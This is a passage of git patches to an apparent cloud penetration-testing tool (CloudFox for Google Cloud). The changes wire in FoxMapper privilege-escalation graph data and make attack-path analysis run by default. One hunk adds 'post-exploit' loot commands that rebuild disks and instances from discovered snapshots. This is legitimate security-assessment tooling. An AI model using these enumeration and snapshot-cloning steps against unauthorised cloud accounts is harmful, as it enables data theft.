c.mu.RUnlock() - - var targets []string - seen := make(map[string]bool) - - checkPaths := func(pathMap map[AttackPathType][]AttackMethod) { - for _, methods := range pathMap { - for _, m := range methods { - if m.Method == methodName && m.ScopeID != "" { - if !seen[m.ScopeID] { - seen[m.ScopeID] = true - targets = append(targets, m.ScopeID) - } - } - } - } - } - - // Check all possible locations for this principal - if pathMap, ok := c.ServiceAccountPaths[principal]; ok { - checkPaths(pathMap) - } - prefixed := "serviceAccount:" + principal - if pathMap, ok := c.PrincipalPaths[prefixed]; ok { - checkPaths(pathMap) - } - if pathMap, ok := c.PrincipalPaths[principal]; ok { - checkPaths(pathMap) - } - - return targets -} - -// Context key for attack path cache -type attackPathCacheKey struct{} - -// Context key for all-checks mode (skip individual module saves) -type allChecksModeKey struct{} - -// GetAttackPathCacheFromContext retrieves the attack path cache from context -func GetAttackPathCacheFromContext(ctx context.Context) *AttackPathCache { - if cache, ok := ctx.Value(attackPathCacheKey{}).(*AttackPathCache); ok { - return cache - } - return nil -} - -// SetAttackPathCacheInContext returns a new context with the attack path cache -func SetAttackPathCacheInContext(ctx context.Context, cache *AttackPathCache) context.Context { - return context.WithValue(ctx, attackPathCacheKey{}, cache) -} - -// IsAllChecksMode returns true if running under all-checks command -// When true, individual modules should skip saving cache to disk -// (all-checks will save consolidated cache at the end) -func IsAllChecksMode(ctx context.Context) bool { - if mode, ok := ctx.Value(allChecksModeKey{}).(bool); ok { - return mode - } - return false -} - -// SetAllChecksMode sets the all-checks mode flag in context -func SetAllChecksMode(ctx context.Context, enabled bool) context.Context { - return context.WithValue(ctx, allChecksModeKey{}, enabled) -} - -// Backward compatibility: Keep PrivescCache context functions working -// They now use the unified AttackPathCache under the hood - -// GetPrivescCacheFromContext retrieves the attack path cache as a privesc cache interface -// This provides backward compatibility for code using the old PrivescCache -func GetPrivescCacheFromContext(ctx context.Context) *AttackPathCache { - return GetAttackPathCacheFromContext(ctx) -} - -// SetPrivescCacheInContext sets the attack path cache in context -// This provides backward compatibility for code using the old PrivescCache -func SetPrivescCacheInContext(ctx context.Context, cache *AttackPathCache) context.Context { - return SetAttackPathCacheInContext(ctx, cache) -} diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go new file mode 100644 index 00000000..1df84067 --- /dev/null +++ b/internal/gcp/foxmapper_cache.go @@ -0,0 +1,275 @@ +package gcpinternal + +import ( + "context" + "fmt" + "strings" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" +) + +// FoxMapperCache wraps FoxMapperService for use by CloudFox modules +// This provides access to FoxMapper's graph-based privilege escalation analysis +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then each project +func (c *FoxMapperCache) TryLoad(orgID string, projectIDs []string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try each project + for _, projectID := range projectIDs { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or any of %d projects", orgID, len(projectIDs)) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if principal can escalate to admin +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// GetStats returns statistics about the FoxMapper graph +func (c *FoxMapperCache) GetStats() (totalNodes, adminNodes, nodesWithPrivesc int) { + if !c.populated || c.service == nil { + return 0, 0, 0 + } + summary := c.service.GetPrivescSummary() + totalNodes = summary["total_nodes"].(int) + adminNodes = summary["admin_nodes"].(int) + nodesWithPrivesc = summary["nodes_with_privesc"].(int) + return +} + +// GetIdentifier returns the org/project ID this cache was loaded for +func (c *FoxMapperCache) GetIdentifier() string { + return c.identifier +} + +// HasPrivesc checks if a service account has privilege escalation potential +func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { + if !c.populated { + return false, "" + } + + node := c.service.GetNode(serviceAccount) + if node == nil { + return false, "" + } + + if node.IsAdmin { + return true, fmt.Sprintf("Admin (%s)", node.AdminLevel) + } + + if node.PathToAdmin { + paths := c.service.GetPrivescPaths(serviceAccount) + if len(paths) > 0 { + return true, fmt.Sprintf("Privesc (%d hops)", paths[0].HopCount) + } + return true, "Privesc" + } + + return false, "" +} + +// Context key for FoxMapper cache +type foxMapperCacheKey struct{} + +// GetFoxMapperCacheFromContext retrieves the FoxMapper cache from context +func GetFoxMapperCacheFromContext(ctx context.Context) *FoxMapperCache { + if cache, ok := ctx.Value(foxMapperCacheKey{}).(*FoxMapperCache); ok { + return cache + } + return nil +} + +// SetFoxMapperCacheInContext returns a new context with the FoxMapper cache +func SetFoxMapperCacheInContext(ctx context.Context, cache *FoxMapperCache) context.Context { + return context.WithValue(ctx, foxMapperCacheKey{}, cache) +} + +// TryLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or nil if not found +// If org-level graph exists, uses that. Otherwise, loads and merges all project graphs. +func TryLoadFoxMapper(orgID string, projectIDs []string) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first - if it exists, it should contain all projects + if orgID != "" { + if err := cache.LoadFromOrg(orgID); err == nil { + return cache + } + } + + // No org-level graph - try to load and merge all project graphs + loadedCount := 0 + for _, projectID := range projectIDs { + if loadedCount == 0 { + // First project - load normally + if err := cache.LoadFromProject(projectID); err == nil { + loadedCount++ + } + } else { + // Subsequent projects - merge into existing graph + path, err := foxmapperservice.FindFoxMapperData(projectID, false) + if err == nil { + if err := cache.service.MergeGraphFromPath(path); err == nil { + loadedCount++ + } + } + } + } + + // If we loaded multiple projects, rebuild the graph + if loadedCount > 1 { + cache.service.RebuildAfterMerge() + cache.identifier = fmt.Sprintf("%d projects", loadedCount) + } + + if loadedCount > 0 { + return cache + } + + return nil +} + +// FindFoxMapperData searches for FoxMapper data and returns the path if found +func FindFoxMapperData(identifier string, isOrg bool) (string, error) { + return foxmapperservice.FindFoxMapperData(identifier, isOrg) +} + +// AttackSummaryProvider is an interface that FoxMapperCache implements +// This allows modules to use the cache interchangeably +type AttackSummaryProvider interface { + IsPopulated() bool + GetAttackSummary(principal string) string +} + +// GetBestAttackSummary returns attack summary from FoxMapper +func GetBestAttackSummary(ctx context.Context, principal string) string { + if fmCache := GetFoxMapperCacheFromContext(ctx); fmCache != nil && fmCache.IsPopulated() { + return fmCache.GetAttackSummary(principal) + } + return "run foxmapper" +} + +// All-checks mode context helper +type allChecksModeKey struct{} + +// SetAllChecksMode sets a flag in context indicating all-checks mode is active +func SetAllChecksMode(ctx context.Context, enabled bool) context.Context { + return context.WithValue(ctx, allChecksModeKey{}, enabled) +} + +// GetAllChecksMode checks if all-checks mode is active in context +func GetAllChecksMode(ctx context.Context) bool { + if enabled, ok := ctx.Value(allChecksModeKey{}).(bool); ok { + return enabled + } + return false +} + +// GetAttackSummaryFromCaches returns attack summary using FoxMapper cache +// The second parameter is kept for backward compatibility but is ignored +func GetAttackSummaryFromCaches(foxMapperCache *FoxMapperCache, _ interface{}, principal string) string { + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } + + // Use FoxMapper for graph-based analysis + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + return foxMapperCache.GetAttackSummary(cleanPrincipal) + } + + return "run foxmapper" +} diff --git a/internal/gcp/persistent_cache.go b/internal/gcp/persistent_cache.go index 6df74e6f..ff4016c0 100644 --- a/internal/gcp/persistent_cache.go +++ b/internal/gcp/persistent_cache.go @@ -102,28 +102,19 @@ func atomicWriteFile(filename string, data []byte, perm os.FileMode) error { // CacheMetadata holds information about when the cache was created type CacheMetadata struct { - CreatedAt time.Time `json:"created_at"` - Account string `json:"account"` - Version string `json:"version"` - ProjectsIn []string `json:"projects_in,omitempty"` // Projects used when creating cache (for attack paths) - TotalProjects int `json:"total_projects,omitempty"` // Total projects in org (for org cache) + CreatedAt time.Time `json:"created_at"` + Account string `json:"account"` + Version string `json:"version"` + ProjectsIn []string `json:"projects_in,omitempty"` // Projects used when creating cache + TotalProjects int `json:"total_projects,omitempty"` // Total projects in org (for org cache) } // PersistentOrgCache is the serializable version of OrgCache type PersistentOrgCache struct { - Metadata CacheMetadata `json:"metadata"` - Organizations []CachedOrganization `json:"organizations"` - Folders []CachedFolder `json:"folders"` - AllProjects []CachedProject `json:"all_projects"` -} - -// PersistentAttackPathCache is the serializable version of attack path data -// Note: RawData is NOT saved to disk as it contains complex types that require gob registration -// and can be very large. The PathInfos are sufficient to reconstruct the cache. -type PersistentAttackPathCache struct { - Metadata CacheMetadata `json:"metadata"` - PathInfos []AttackPathInfo `json:"path_infos"` - // RawData is intentionally excluded from persistence - it's only used during runtime + Metadata CacheMetadata `json:"metadata"` + Organizations []CachedOrganization `json:"organizations"` + Folders []CachedFolder `json:"folders"` + AllProjects []CachedProject `json:"all_projects"` } // GetCacheDirectory returns the cache directory for a given account @@ -153,11 +144,6 @@ func OrgCacheFilename() string { return "org-cache.gob" } -// AttackPathCacheFilename returns the filename for attack path cache -func AttackPathCacheFilename() string { - return "attack-paths.gob" -} - // SaveOrgCacheToFile saves the org cache to a gob file using atomic write func SaveOrgCacheToFile(cache *OrgCache, baseDir, account, version string) error { cacheDir := GetCacheDirectory(baseDir, account) @@ -238,110 +224,6 @@ func OrgCacheExists(baseDir, account string) bool { return err == nil } -// SaveAttackPathCacheToFile saves attack path data to a gob file using atomic write -func SaveAttackPathCacheToFile(cache *AttackPathCache, projectIDs []string, baseDir, account, version string) error { - cacheDir := GetCacheDirectory(baseDir, account) - if err := os.MkdirAll(cacheDir, 0755); err != nil { - return fmt.Errorf("failed to create cache directory: %w", err) - } - - // Extract path infos from cache - var pathInfos []AttackPathInfo - for principal, pathMap := range cache.PrincipalPaths { - for pathType, methods := range pathMap { - for _, method := range methods { - pathInfos = append(pathInfos, AttackPathInfo{ - Principal: principal, - Method: method.Method, - PathType: pathType, - Category: method.Category, - RiskLevel: method.RiskLevel, - Target: method.Target, - Permissions: method.Permissions, - ScopeType: method.ScopeType, - ScopeID: method.ScopeID, - }) - } - } - } - - persistent := PersistentAttackPathCache{ - Metadata: CacheMetadata{ - CreatedAt: time.Now(), - Account: account, - Version: version, - ProjectsIn: projectIDs, - }, - PathInfos: pathInfos, - // Note: RawData is not saved - it contains complex types and is only needed at runtime - } - - filename := filepath.Join(cacheDir, AttackPathCacheFilename()) - - // Use atomic write: write to temp file, then rename - if err := atomicWriteGob(filename, persistent); err != nil { - return fmt.Errorf("failed to write cache file: %w", err) - } - - // Also save JSON metadata for debugging (without raw data which can be huge) - metaFilename := filepath.Join(cacheDir, "attack-paths-meta.json") - metaData := struct { - Metadata CacheMetadata `json:"metadata"` - PathCount int `json:"path_count"` - PrivescCount int `json:"privesc_count"` - ExfilCount int `json:"exfil_count"` - LateralCount int `json:"lateral_count"` - }{ - Metadata: persistent.Metadata, - PathCount: len(pathInfos), - PrivescCount: cache.PrivescCount, - ExfilCount: cache.ExfilCount, - LateralCount: cache.LateralCount, - } - jsonData, err := json.MarshalIndent(metaData, "", " ") - if err == nil { - atomicWriteFile(metaFilename, jsonData, 0644) - } - - return nil -} - -// LoadAttackPathCacheFromFile loads attack path data from a gob file -func LoadAttackPathCacheFromFile(baseDir, account string) (*AttackPathCache, *CacheMetadata, error) { - cacheDir := GetCacheDirectory(baseDir, account) - filename := filepath.Join(cacheDir, AttackPathCacheFilename()) - - file, err := os.Open(filename) - if err != nil { - if os.IsNotExist(err) { - return nil, nil, nil // Cache doesn't exist, not an error - } - return nil, nil, fmt.Errorf("failed to open cache file: %w", err) - } - defer file.Close() - - var persistent PersistentAttackPathCache - decoder := gob.NewDecoder(file) - if err := decoder.Decode(&persistent); err != nil { - return nil, nil, fmt.Errorf("failed to decode cache: %w", err) - } - - // Convert to in-memory cache - cache := NewAttackPathCache() - cache.PopulateFromPaths(persistent.PathInfos) - // Note: RawData is not loaded from disk - it's populated at runtime when needed - - return cache, &persistent.Metadata, nil -} - -// AttackPathCacheExists checks if an attack path cache file exists -func AttackPathCacheExists(baseDir, account string) bool { - cacheDir := GetCacheDirectory(baseDir, account) - filename := filepath.Join(cacheDir, AttackPathCacheFilename()) - _, err := os.Stat(filename) - return err == nil -} - // GetCacheAge returns how old a cache file is func GetCacheAge(baseDir, account, cacheType string) (time.Duration, error) { cacheDir := GetCacheDirectory(baseDir, account) @@ -349,8 +231,6 @@ func GetCacheAge(baseDir, account, cacheType string) (time.Duration, error) { switch cacheType { case "org": filename = filepath.Join(cacheDir, OrgCacheFilename()) - case "attack-paths": - filename = filepath.Join(cacheDir, AttackPathCacheFilename()) default: return 0, fmt.Errorf("unknown cache type: %s", cacheType) } @@ -381,10 +261,6 @@ func DeleteCache(baseDir, account, cacheType string) error { filename = filepath.Join(cacheDir, OrgCacheFilename()) // Also remove JSON os.Remove(filepath.Join(cacheDir, "org-cache.json")) - case "attack-paths": - filename = filepath.Join(cacheDir, AttackPathCacheFilename()) - // Also remove JSON meta - os.Remove(filepath.Join(cacheDir, "attack-paths-meta.json")) default: return fmt.Errorf("unknown cache type: %s", cacheType) } diff --git a/internal/gcp/privesc_cache.go b/internal/gcp/privesc_cache.go deleted file mode 100644 index 461b0ab3..00000000 --- a/internal/gcp/privesc_cache.go +++ /dev/null @@ -1,18 +0,0 @@ -package gcpinternal - -// This file provides backward compatibility aliases for the unified AttackPathCache. -// All new code should use AttackPathCache and related types directly. - -// PrivescMethod is kept for backward compatibility -// DEPRECATED: Use AttackMethod instead -type PrivescMethod = AttackMethod - -// PrivescCache is an alias to AttackPathCache for backward compatibility -// DEPRECATED: Use AttackPathCache instead -type PrivescCache = AttackPathCache - -// NewPrivescCache creates a new attack path cache (backward compatible) -// DEPRECATED: Use NewAttackPathCache instead -func NewPrivescCache() *AttackPathCache { - return NewAttackPathCache() -} From 7a18090609f0308cb92e013f357e0eb2dd4cff48 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Mon, 16 Feb 2026 15:17:04 -0500 Subject: [PATCH 38/48] removed attackpath and orgcache flags and enable by default --- README.md | 17 +- cli/gcp.go | 39 ++-- gcp/commands/appengine.go | 2 +- gcp/commands/backupinventory.go | 132 +++++++---- gcp/commands/bucketenum.go | 32 +-- gcp/commands/certmanager.go | 120 +--------- gcp/commands/cloudarmor.go | 214 +++++++----------- gcp/commands/cloudbuild.go | 2 +- gcp/commands/cloudrun.go | 11 +- gcp/commands/composer.go | 2 +- gcp/commands/crossproject.go | 106 ++++----- gcp/commands/dataflow.go | 2 +- gcp/commands/dataproc.go | 2 +- gcp/commands/functions.go | 7 +- gcp/commands/gke.go | 2 +- gcp/commands/instances.go | 2 +- gcp/commands/notebooks.go | 4 +- gcp/commands/organizations.go | 2 +- gcp/commands/scheduler.go | 2 +- gcp/commands/serviceagents.go | 5 +- .../crossProjectService.go | 95 +++++--- internal/gcp/foxmapper_cache.go | 43 +++- internal/log.go | 12 + 23 files changed, 384 insertions(+), 471 deletions(-) diff --git a/README.md b/README.md index 7836c103..c808d455 100644 --- a/README.md +++ b/README.md @@ -301,21 +301,22 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http CloudFox GCP uses a **unified attack path analysis** system that combines privilege escalation, lateral movement, and data exfiltration analysis. The three attack path modules share a common backend (`attackpathService`) that analyzes IAM policies across all 4 hierarchy levels: Organization → Folder → Project → Resource. -### `--attack-paths` Global Flag +### Attack Path Column -When running compute/service modules, add `--attack-paths` to see attack path capabilities for service accounts: +CloudFox automatically loads FoxMapper graph data when available and shows attack path capabilities in module output. Run foxmapper first to populate the Attack Paths column: ```bash -# Run instances module with attack path analysis -cloudfox gcp instances -p my-project --attack-paths +# First, generate the attack path graph +foxmapper gcp graph create -p my-project -# Run service accounts with attack paths -cloudfox gcp serviceaccounts --all-projects --attack-paths +# Then run cloudfox modules - Attack Paths column will be populated automatically +cloudfox gcp instances -p my-project +cloudfox gcp serviceaccounts --all-projects ``` -This adds an **"Attack Paths"** column showing: `Yes (P:3 E:2 L:1)` where P=Privesc, E=Exfil, L=Lateral counts. +The **"Attack Paths"** column shows: `Yes (P:3 E:2 L:1)` where P=Privesc, E=Exfil, L=Lateral counts. If foxmapper hasn't been run, the column shows "run foxmapper". -**Modules supporting `--attack-paths`**: instances, serviceaccounts, functions, cloudrun, gke, composer, dataproc, dataflow, notebooks, cloudbuild, scheduler, appengine +**Modules with Attack Paths column**: instances, serviceaccounts, functions, cloudrun, gke, composer, dataproc, dataflow, notebooks, cloudbuild, scheduler, appengine, service-agents | Provider | Command Name | Description | | - | - | - | diff --git a/cli/gcp.go b/cli/gcp.go index 0a62a96f..24f55bab 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -32,12 +32,6 @@ var ( GCPWrapTable bool GCPFlatOutput bool - // Attack path analysis flag - GCPAttackPaths bool - - // Organization cache flag - enumerates all orgs/folders/projects for cross-project analysis - GCPOrgCache bool - // Refresh cache flag - force re-enumeration even if cache exists GCPRefreshCache bool @@ -125,11 +119,9 @@ var ( // Get account for cache operations account, _ := ctx.Value("account").(string) - // If --attack-paths flag is set, try to load FoxMapper data + // Always try to load FoxMapper data for attack path analysis // This allows individual modules to show the Attack Paths column - if GCPAttackPaths && len(GCPProjectIDs) > 0 { - GCPLogger.InfoM("Looking for FoxMapper graph data...", "gcp") - + if len(GCPProjectIDs) > 0 { // Get org ID from hierarchy if available (GCPOrganization flag may be empty) orgID := GCPOrganization if orgID == "" { @@ -144,21 +136,22 @@ var ( if foxMapperCache != nil && foxMapperCache.IsPopulated() { ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() - GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc - modules will show Attack Paths column", - totalNodes, adminNodes, nodesWithPrivesc), "gcp") - } else { - GCPLogger.InfoM("No FoxMapper data found. Run 'foxmapper gcp graph create' to generate graph data for attack path analysis.", "gcp") + ageDays := foxMapperCache.GetDataAgeDays() + + if ageDays >= 7 { + GCPLogger.WarnM(fmt.Sprintf("FoxMapper data is %d days old - consider running 'foxmapper gcp graph create' to refresh", + ageDays), "gcp") + } + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc (data age: %d days)", + totalNodes, adminNodes, nodesWithPrivesc, ageDays), "gcp") } } - // If --org-cache flag is set, load or enumerate all orgs/folders/projects - // This is useful for cross-project analysis modules - if GCPOrgCache { - GCPLogger.InfoM("Loading/enumerating organization data...", "gcp") - orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) - if orgCache != nil && orgCache.IsPopulated() { - ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) - } + // Always try to load org cache for cross-project analysis + // Cache auto-refreshes after 24 hours + orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) } cmd.SetContext(ctx) @@ -487,8 +480,6 @@ func init() { // GCPCommands.PersistentFlags().IntVarP(&Goroutines, "max-goroutines", "g", 30, "Maximum number of concurrent goroutines") GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") - GCPCommands.PersistentFlags().BoolVar(&GCPAttackPaths, "attack-paths", false, "Run attack path analysis (privesc/exfil/lateral) and add Attack Paths column to module output") - GCPCommands.PersistentFlags().BoolVar(&GCPOrgCache, "org-cache", false, "Enumerate all accessible orgs/folders/projects and cache for cross-project analysis") GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data (cache auto-expires after 24 hours)") // Available commands diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index e015ab92..44795a7a 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -534,7 +534,7 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if ver.ServiceAccount != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, ver.ServiceAccount) diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 83a4707f..1d9bb573 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -14,7 +14,7 @@ import ( "github.com/spf13/cobra" "google.golang.org/api/compute/v1" - "google.golang.org/api/sqladmin/v1beta4" + sqladmin "google.golang.org/api/sqladmin/v1beta4" ) // Module name constant @@ -62,18 +62,20 @@ type IAMBinding struct { } type ComputeSnapshot struct { - ProjectID string - Name string - SourceDisk string - Status string - DiskSizeGB int64 - StorageBytes int64 - CreationTime string - StorageLocats []string - AutoCreated bool - SnapshotType string - IAMBindings []IAMBinding - PublicAccess bool + ProjectID string + Name string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + StorageLocats []string + AutoCreated bool + SnapshotType string + IAMBindings []IAMBinding + PublicAccess bool + EncryptionType string + KMSKeyName string } // ------------------------------ @@ -82,8 +84,8 @@ type ComputeSnapshot struct { type BackupInventoryModule struct { gcpinternal.BaseGCPModule - ProjectResources map[string][]BackupResource // projectID -> resources - ProjectSnapshots map[string][]ComputeSnapshot // projectID -> snapshots + ProjectResources map[string][]BackupResource // projectID -> resources + ProjectSnapshots map[string][]ComputeSnapshot // projectID -> snapshots LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex @@ -291,17 +293,31 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI req := computeService.Snapshots.List(projectID) err := req.Pages(ctx, func(page *compute.SnapshotList) error { for _, snapshot := range page.Items { + // Determine encryption type and KMS key name + encryptionType := "Google-managed" + kmsKeyName := "" + if snapshot.SnapshotEncryptionKey != nil { + if snapshot.SnapshotEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKeyName = snapshot.SnapshotEncryptionKey.KmsKeyName + } else if snapshot.SnapshotEncryptionKey.RawKey != "" || snapshot.SnapshotEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + snap := ComputeSnapshot{ - ProjectID: projectID, - Name: snapshot.Name, - SourceDisk: snapshot.SourceDisk, - Status: snapshot.Status, - DiskSizeGB: snapshot.DiskSizeGb, - StorageBytes: snapshot.StorageBytes, - CreationTime: snapshot.CreationTimestamp, - StorageLocats: snapshot.StorageLocations, - AutoCreated: snapshot.AutoCreated, - SnapshotType: snapshot.SnapshotType, + ProjectID: projectID, + Name: snapshot.Name, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + StorageLocats: snapshot.StorageLocations, + AutoCreated: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + EncryptionType: encryptionType, + KMSKeyName: kmsKeyName, } // Get IAM policy for this snapshot @@ -324,6 +340,34 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI m.mu.Lock() m.ProjectSnapshots[projectID] = append(m.ProjectSnapshots[projectID], snap) m.disksWithBackups[snapshot.SourceDisk] = true + + // Add post-exploit commands for snapshots + if m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["backup-inventory-commands"]; lootFile != nil { + // Determine a zone from storage locations or use a default + zone := "us-central1-a" + if len(snapshot.StorageLocations) > 0 { + zone = snapshot.StorageLocations[0] + "-a" + } + + lootFile.Contents += fmt.Sprintf( + "### Snapshot: %s (Source: %s, Size: %dGB)\n"+ + "# Create a disk from this snapshot\n"+ + "gcloud compute disks create disk-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --source-snapshot=%s\n\n"+ + "# Create an instance using a disk from this snapshot\n"+ + "gcloud compute instances create instance-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --disk=name=disk-from-%s,boot=yes\n\n", + snapshot.Name, m.extractDiskName(snapshot.SourceDisk), snapshot.DiskSizeGb, + snapshot.Name, projectID, zone, snapshot.Name, + snapshot.Name, projectID, zone, snapshot.Name, + ) + } + } m.mu.Unlock() } return nil @@ -504,18 +548,7 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", } } - if lootFile := m.LootMap[info.ProjectID]["backup-inventory-commands"]; lootFile != nil { - lootFile.Contents += fmt.Sprintf( - "# Unprotected disk: %s (%s) - %dGB\n"+ - "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ - " --project=%s \\\n"+ - " --region=%s \\\n"+ - " --max-retention-days=30 \\\n"+ - " --daily-schedule\n\n", - info.Name, info.ProjectID, info.SizeGB, - info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), - ) - } + // No loot commands for unprotected disks - these are informational only } } @@ -541,15 +574,7 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", } } - if lootFile := m.LootMap[info.ProjectID]["backup-inventory-commands"]; lootFile != nil { - lootFile.Contents += fmt.Sprintf( - "# Unprotected SQL instance: %s\n"+ - "gcloud sql instances patch %s \\\n"+ - " --backup-start-time=02:00 \\\n"+ - " --enable-bin-log\n\n", - instanceName, instanceName, - ) - } + // No loot commands for unprotected SQL instances - these are informational only } } } @@ -589,7 +614,6 @@ func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { return zone } - // ------------------------------ // Output Generation // ------------------------------ @@ -631,6 +655,7 @@ func (m *BackupInventoryModule) getSnapshotsHeader() []string { "Type", "Auto Created", "Locations", + "Encryption", "IAM Binding Role", "IAM Binding Principal", "Public", @@ -698,6 +723,17 @@ func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot publicAccess = "Yes" } + // Format encryption - show KMS key name if CMEK + encryptionDisplay := s.EncryptionType + if s.EncryptionType == "CMEK" && s.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(s.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + // If no IAM bindings, still show the snapshot if len(s.IAMBindings) == 0 { body = append(body, []string{ @@ -710,6 +746,7 @@ func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot s.SnapshotType, autoCreatedStr, strings.Join(s.StorageLocats, ","), + encryptionDisplay, "-", "-", publicAccess, @@ -728,6 +765,7 @@ func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot s.SnapshotType, autoCreatedStr, strings.Join(s.StorageLocats, ","), + encryptionDisplay, binding.Role, member, publicAccess, diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index 1b1f43d3..bc8b80b9 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -14,10 +14,10 @@ import ( ) var ( - bucketEnumMaxObjects int - bucketEnumAllObjects bool - bucketEnumNoLimit bool - maxObjectsWasSet bool // tracks if --max-objects was explicitly set + bucketEnumMaxObjects int + bucketEnumAllObjects bool + bucketEnumNoLimit bool + maxObjectsWasSet bool // tracks if --max-objects was explicitly set ) var GCPBucketEnumCommand = &cobra.Command{ @@ -42,16 +42,20 @@ File categories detected: - Source: Git repositories - Cloud: Cloud Functions source, build artifacts -Use --all-objects to enumerate ALL bucket contents (not just sensitive files). -WARNING: Full enumeration may take a long time for 